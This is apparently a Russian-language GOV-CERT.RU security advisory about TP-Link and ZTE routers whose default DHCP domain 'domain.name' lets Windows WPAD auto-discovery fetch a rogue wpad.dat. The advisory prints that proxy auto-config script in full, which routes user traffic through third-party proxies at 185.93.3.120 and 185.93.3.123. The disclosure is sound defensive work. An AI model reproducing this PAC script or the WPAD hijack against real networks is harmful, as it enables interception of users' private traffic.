GOV-CERT.RU предупреждает об угрозах в CPE-оборудовании

В настройках роутеров TP-Link (модель TD854W) и ZTE (модель H108) по умолчанию установлен следующий параметр протокола DHCP (Dynamic Host Configuration Protocol): Default Domain = “domain.name”.

По умолчанию в операционной системе Windows включена автоматическая настройка proxy-сервера с использованием протокола Web Proxy Auto-Discovery Protocol (WPAD). Файлом, содержащим параметры для настройки, является wpad.dat, для обращения к которому система отправляет HTTP-запрос на http://wpad.%domain%/wpad.dat, где вместо %domain% указывается домен рабочей станции. Так как в настройках роутера прописан домен “domain.name”, то происходит обращение к http://wpad.domain.name/wpad.dat.

Содержание файла wpad.dat:

function FindProxyForURL(url, host) {      if (isPlainHostName(host) ||          dnsDomainIs(host, ".windowsupdate.com") ||          dnsDomainIs(host, ".microsoft.com") ||          dnsDomainIs(host, ".baidu.com") ||          dnsDomainIs(host, ".kaspersky.com") ||          dnsDomainIs(host, ".live.com") ||          isInNet(host, "10.0.0.0", "255.0.0.0") ||          isInNet(host, "172.16.0.0", "255.255.224.0") ||          isInNet(host, "192.168.0.0", "255.255.0.0") ||          isInNet(host, "127.0.0.0", "255.0.0.0"))          return "DIRECT";      else          return 'PROXY 185.93.3.120:8080';

Прописанные в файле wpad.dat функции перенаправляют трафик на сторонние proxy-сервера 185.93.3.120:8080 и 185.93.3.123:8080, что представляет угрозу конфиденциальности пользовательских данных.

GOV-CERT.RU рекомендует владельцам и операторам связи, использующим роутеры TP-Link и ZTE в качестве клиентского телекоммуникационного оборудования (Customer Premises Equipment, CPE) проверить их конфигурацию и в случае необходимости изменить настройки параметра Default Domain.